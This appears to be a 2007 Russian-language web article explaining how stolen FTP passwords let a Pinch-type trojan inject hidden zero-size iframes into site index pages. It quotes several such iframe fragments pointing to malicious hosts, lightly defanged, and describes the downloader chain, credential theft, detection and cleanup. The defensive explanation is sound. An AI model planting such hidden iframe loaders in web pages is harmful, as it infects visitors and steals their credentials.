Главная сайта | Форум | Фотоальбом | Регистрация   | Вход | Cайт в избранное | Правила сайта и форума

Приветствую Вас Гость | RSS


Фильмы | Онлайн Видео | Софт | Новости и Статьи | Игры онлайн | Фотоальбом | Форум

ДЛЯ ПРОСМОТРА САЙТА РЕКОМЕНДУЕТСЯ ИСПОЛЬЗОВАТЬ:  Uran - браузер от uCoz на базе проекта Chromium. | Google ChromeOpera | Firefox 


МЕНЮ САЙТА

ПОИСК ПО САЙТУ

Gamesblender № 722: народные GeForce 50, подорожание консолей и ролевая свобода в The Outer Worlds 2

Лучшие космические игры 2025 года - новые релизы и крупные обновления

Elite Dangerous: Trailblazers (Первопроходцы) - Большое предстоящее обновление

Gamesblender 675: новый шутер от Valve, Stellar Blade на ПК и ускоренный ИИ на GeForce RTX

Gamesblender № 674: новые боссы PlayStation, опасная стратегия Microsoft и ассасины в Японии

Gamesblender № 673: внезапная Hades II, закрытие студий Bethesda и контроль видеоигр в России

Gamesblender № 661: будущее Xbox, новая игра авторов Ori, «неправильная» Subnautica 2 и прощание с Dead Cells

Gamesblender № 660: «портативки» от Sony и Microsoft, эксклюзивы Xbox на PlayStation, сделка Epic и Disney и показ Final Fantasy VII Rebirth

Tekken 8: 10 аниме из 10

Gamesblender № 659: Death Stranding 2 и другие показы State of Play, новый президент Blizzard, отмена Deus Ex и перенос «Смуты»

Во что поиграть на этой неделе — 14 декабря + Лучшие скидки на игры

Игромания! Игровые новости, 8 мая (Darksiders III, Gears of War, Death Stranding, Tekken 7)

Игромания! ИГРОВЫЕ НОВОСТИ, 16 сентября (Death Stranding, Final Fantasy VII, Project Resistance)

Во что поиграть на этой неделе — 26 апреля + Лучшие скидки на игры

Игромания! Игровые новости, 11 апреля (Uncharted 4, God of War 4, Final Fantasy 7 Remake)

Игромания! Игровые новости, 22 мая (Ведьмак, Destiny 2, Life is Strange, Sega, GTA 5)

Во что поиграть на этой неделе — 10 августа + Лучшие скидки на игры

Во что поиграть на этой неделе — 22 декабря (PUBG, Bridge Constructor Portal, Tiny Metal)
СТАТИСТИКА
Всего материалов:
Фильмомания: 1515
Видео: 220
Каталог файлов: 95
Каталог статей: 6814
Фотоальбом: 1236
Форум: 1166/8667
Каталог сайтов: 386

Всего зарегистрировано:
Зарегистрировано: 1773
Сегодня: 0
Вчера: 0
За неделю: 1
За месяц: 10

Из них:
Пользователи: 1698
Проверенные: 23
Друзья: 5
Редакторы: 0
Журналисты: 8
В вечном бане: 33
Модераторы: 1
Администраторы: 3

Из них:
Парней 1318
Девушек 453


ON-Line всего: 4
Гостей: 4
Пользователей: 0

Сейчас на сайте:


Кто был?
Фокусник, jntech,
День Рождения у: sniws(52), i17igr(62), marsel1989(37), Rajah(55), Rajah5297(55)
ВЫ МОЖЕТЕ ОКАЗАТЬ ПОДДЕРЖКУ ЗА ТРУДЫ, ПОЖЕРТВОВАВ ЛЮБУЮ СУММЫ.

WEBMONEY



Категории каталога

Главная » Статьи » Статьи » Статьи: Общие

Новый троян, похищающий пароли доступа

Новый троян, похищающий пароли доступа и не определяющийся антивирусными программами.
Как бороться с прокатившейся эпидемией изменения
индексных страниц сайтов?
 

Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.
Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги :).
Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.
 Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:
iframe src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или iframe src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /iframe или другой сайт

Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку :). Тег iframe, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере :)) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне smile Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.
Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.
Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.
Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".
Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.

Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.
Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите
Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.
Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега 'iframe' с атрибутами "width="0" height="0" или width="1" height="1".
Если с Вами произошла эта неприятность, то как от нее избавиться читайте на странице:
Очистка операционной системы от вирусов, троянов и программ-шпионов

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Ознакомиться с ним Вы можете по баннеру ниже:

Вы можете попробовать новый быстрый браузер Mozilla Firefox — это браузер, обладающий функцией блокировки всплывающих окон и просмотра страниц на вкладках, а также функциями безопасности и конфиденциальности. В браузер Firefox интегрирована панель инструментов Google, чтобы предоставить пользователям еще больше полезных функций: поиск в Google, проверку правописания и автозаполнение.
Установите и попробуйте - Вы не потеряете ничего. А вот если Mozilla Firefox оправдает Ваши ожидания, тогда забудете про все проблемы, связанные с осликом ИЕ.
Новую информацию об этой теме можете прочитать на странице

Если на странице вы заметили в посте отсутствие изображений, просьба сообщить , нажав на кнопку.



После прочтения материала " Новый троян, похищающий пароли доступа ", можно просмотреть форум и поискать темы по данной игре.



ДРУГИЕ МАТЕРИАЛЫ
«Лаборатория Касперского» рассказала о ловушках Интернета
Лечение варикозного расширения вен
Простой способ "вечной" работы Касперского
IDF SF 2008: фотографии SSD-накопителей Intel
Google не отвечает за поисковые результаты
Безопасность: Усиление защиты служб в Windows Vista
Google Docs начинает соревнование с Office 2010
Ролевая игра Witcher 2: Assassins of Kings осталась без издателя
Игру Wolfenstein отозвали в Германии из-за использования свастики
Lenovo ThinkPad X301 – новый соперник для MacBook Air
Первый в отрасли DVD привод с поддержкой Qflix
Cоздан телескоп для ускорения работы компьютерных сетей в 27 раз
Гоночная игра NFS: Shift победила Бэтмена в Великобритании
Виды эпиляции
Конфликты или гармонию - что мы даем нашим детям?
Всё, что нужно знать о USB 3.0
Польза и вред красного вина
Открытое бета-тестирование многопользовательской игры Aion
Начало работы с Project Server 2007
Архивация и восстановление: Резервное копирование в Windows 7

Если вам понравился материал "Новый троян, похищающий пароли доступа", - поделитесь ним с другими.


html-cсылка на публикацию
BB-cсылка на публикацию
Прямая ссылка на публикацию


Категория: Статьи: Общие | Добавил: Фокусник (14.08.2007)
Просмотров: 4126

Ниже вы можете добавить комментарии к материалу " Новый троян, похищающий пароли доступа "

Внимание: Все ссылки и не относящиеся к теме комментарии будут удаляться. Для ссылок есть форум.


Всего комментариев : 0
avatar
ФОРМА ВХОДА
ПОЖЕРТВОВАНИЯ

WMZ: Z143317192317
WMB: X706980753649

Boosty - Donate

Payeer: P48650932
На кофе / ko-fi
ПАРТНЕРЫ

World of Warships — это free-to-play ММО-экшен, который позволяет окунуться в мир масштабных военно-морских баталий. Возьмите под управление легендарные боевые корабли первой половины ХХ века и завоюйте господство на бескрайних океанских просторах.

Курсы обмена WebMoney


Что такое ресурс Turbobit и как качать.




Получи 10 ГБ места бесплатно, на всю жизнь.


Boosty – сервис по сбору донатов.
Игрозор №204
Игрозор №204
Семён Слепаков- Разговор мужа с женой
Семён Слепаков- Разговор мужа с женой
Видеообзор игры Need for Speed
Видеообзор игры Need for Speed
Видеообзор игры Yesterday Origins
Видеообзор игры Yesterday Origins
«A Skate Escalation» c Киллианом Мартином
«A Skate Escalation» c Киллианом Мартином
Gamesblender №309: неожиданное появление Darksiders III и ужесточение контроля над подарками в Steam
Gamesblender №309: неожиданное появление Darksiders III и ужесточение контроля над подарками в Steam
Видеообзор игры Medal of Honor: Warfighter
Видеообзор игры Medal of Honor: Warfighter
Бременские музыканты - Все серии
Бременские музыканты - Все серии
Видеообзор игры DreadOut
Видеообзор игры DreadOut
Властелин колец 4 [Обзор] / [Трейлер на русском]
Властелин колец 4 [Обзор] / [Трейлер на русском]

Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Ночной позитив: смешные картинки и фото (38 шт)
Ночной позитив: смешные картинки и фото (38 шт)
Фотоприколы с кошками (17 шт)
Фотоприколы с кошками (17 шт)
Детские фотографии знаменитостей - 14 шт
Детские фотографии знаменитостей - 14 шт
Еще одна порция свежих приколов (28 шт)
Еще одна порция свежих приколов (28 шт)
Котики-антидепрессанты
Котики-антидепрессанты
Как выглядит путешествие в «превосходном классе» поезда Glacier Express
Как выглядит путешествие в «превосходном классе» поезда Glacier Express
15-летний художник из Сербии рисует по памяти невероятно детализированные изображения животных (14 фото)
15-летний художник из Сербии рисует по памяти невероятно детализированные изображения животных (14 фото)
СТАТИСТИКА
Яндекс.Метрика


Copyright © 2000-2025, Alex LTD and System PervertedХостинг от uCoz